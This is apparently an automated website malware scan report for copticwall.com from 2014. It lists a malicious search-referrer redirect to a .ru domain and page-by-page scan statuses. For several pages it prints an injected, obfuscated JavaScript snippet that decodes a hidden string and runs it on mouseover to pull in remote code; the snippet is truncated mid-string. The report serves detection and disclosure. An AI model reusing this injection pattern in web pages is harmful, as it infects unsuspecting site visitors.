Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.copticwall.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.copticwall.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Mon, 12 May 2014 05:26:08 GMT Location: http://medicsph.ru/ Server: Apache Content-Length: 271 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.copticwall.com/ | 200 OK Content-Length: 8659 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window.w3ssss=function(){ var scriptlink = "http://jquery.googlecode.com/svn/trunk/gadget/scripts/s.js?userrefer=%0A7gw%0Anayies4flsrrd4p%3Du4fdsauogkncu2zutcymahnepbdnkg8t5wd.6ulcwprr5hjef37ace0tfgpe1zlEz19lkt9ey3sm96oeko4nhuvtfy5%282wj%226ofils0fowyrx6wanu4m6ajeinf%22bqs%293e0%3Bd5i%0Ayczieyifqi9rct4.sl6snrzre2ocola%3Dg1q%22cd8h7irth8ltcufpz5g%3Adu6/g4u/wwovvb0cb8p-p74bkadu0krsxuaip6znd9eegtrsghbsejf.ponc8kiocetmh6r/cp8i63lndkg.8rrpbewh9kepdka%22x5n%3B73r%0Av27iar6fht8rpsz.r5ksx1ott for(var i=0,content=''; i<userref.length; i+=visitnum){content+=userref.charAt(i);} try{ window[cont](content) }catch(e){} } window.CheckBody = function() { if (!document.body){setTimeout('CheckBody();',10);} else { window.nomore=false; document.body.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} window.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} } } CheckBody(); Antivirus reports:
| ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 22456 Content-Type: text/javascript | clean |
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://www.copticwall.com/coptic-museum/ | 200 OK Content-Length: 8564 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window.w3ssss=function(){ var scriptlink = "http://jquery.googlecode.com/svn/trunk/gadget/scripts/s.js?userrefer=%0A7gw%0Anayies4flsrrd4p%3Du4fdsauogkncu2zutcymahnepbdnkg8t5wd.6ulcwprr5hjef37ace0tfgpe1zlEz19lkt9ey3sm96oeko4nhuvtfy5%282wj%226ofils0fowyrx6wanu4m6ajeinf%22bqs%293e0%3Bd5i%0Ayczieyifqi9rct4.sl6snrzre2ocola%3Dg1q%22cd8h7irth8ltcufpz5g%3Adu6/g4u/wwovvb0cb8p-p74bkadu0krsxuaip6znd9eegtrsghbsejf.ponc8kiocetmh6r/cp8i63lndkg.8rrpbewh9kepdka%22x5n%3B73r%0Av27iar6fht8rpsz.r5ksx1ott for(var i=0,content=''; i<userref.length; i+=visitnum){content+=userref.charAt(i);} try{ window[cont](content) }catch(e){} } window.CheckBody = function() { if (!document.body){setTimeout('CheckBody();',10);} else { window.nomore=false; document.body.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} window.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} } } CheckBody(); Antivirus reports:
| ||
http://www.copticwall.com/coptic-museum/../index.php | 200 OK Content-Length: 8659 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window.w3ssss=function(){ var scriptlink = "http://jquery.googlecode.com/svn/trunk/gadget/scripts/s.js?userrefer=%0A7gw%0Anayies4flsrrd4p%3Du4fdsauogkncu2zutcymahnepbdnkg8t5wd.6ulcwprr5hjef37ace0tfgpe1zlEz19lkt9ey3sm96oeko4nhuvtfy5%282wj%226ofils0fowyrx6wanu4m6ajeinf%22bqs%293e0%3Bd5i%0Ayczieyifqi9rct4.sl6snrzre2ocola%3Dg1q%22cd8h7irth8ltcufpz5g%3Adu6/g4u/wwovvb0cb8p-p74bkadu0krsxuaip6znd9eegtrsghbsejf.ponc8kiocetmh6r/cp8i63lndkg.8rrpbewh9kepdka%22x5n%3B73r%0Av27iar6fht8rpsz.r5ksx1ott for(var i=0,content=''; i<userref.length; i+=visitnum){content+=userref.charAt(i);} try{ window[cont](content) }catch(e){} } window.CheckBody = function() { if (!document.body){setTimeout('CheckBody();',10);} else { window.nomore=false; document.body.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} window.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} } } CheckBody(); Antivirus reports:
| ||
http://www.copticwall.com/coptic-museum/../coptic_arts_wall_09.php | 200 OK Content-Length: 3471 Content-Type: text/html | clean |
http://www.copticwall.com/test404page.js | 404 Not Found Content-Length: 399 Content-Type: text/html | clean |
http://www.copticwall.com/coptic-museum/../coptic_arts_wall_11.php | 200 OK Content-Length: 2973 Content-Type: text/html | clean |
http://www.copticwall.com/coptic-museum/../coptic_arts_wall_12.php | 200 OK Content-Length: 2906 Content-Type: text/html | clean |
http://www.copticwall.com/coptic-museum/../coptic_arts_wall_15.php | 200 OK Content-Length: 3562 Content-Type: text/html | clean |
http://www.copticwall.com/coptic-museum/../coptic_arts-1-500AD.php | 200 OK Content-Length: 7278 Content-Type: text/html | clean |
http://www.copticwall.com/coptic-museum/../coptic_arts_wall_17.php | 200 OK Content-Length: 2937 Content-Type: text/html | clean |
http://www.copticwall.com/coptic-museum/../coptic_arts_wall_19.php | 200 OK Content-Length: 3017 Content-Type: text/html | clean |
http://www.copticwall.com/coptic-museum/../coptic_arts_wall_20.php | 200 OK Content-Length: 2878 Content-Type: text/html | clean |
http://www.copticwall.com/coptic-museum/../coptic_arts_wall_21.php | 200 OK Content-Length: 3067 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=copticwall.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://copticwall.com/
Result: copticwall.com is not infected or malware details are not published yet.
Result: copticwall.com is not infected or malware details are not published yet.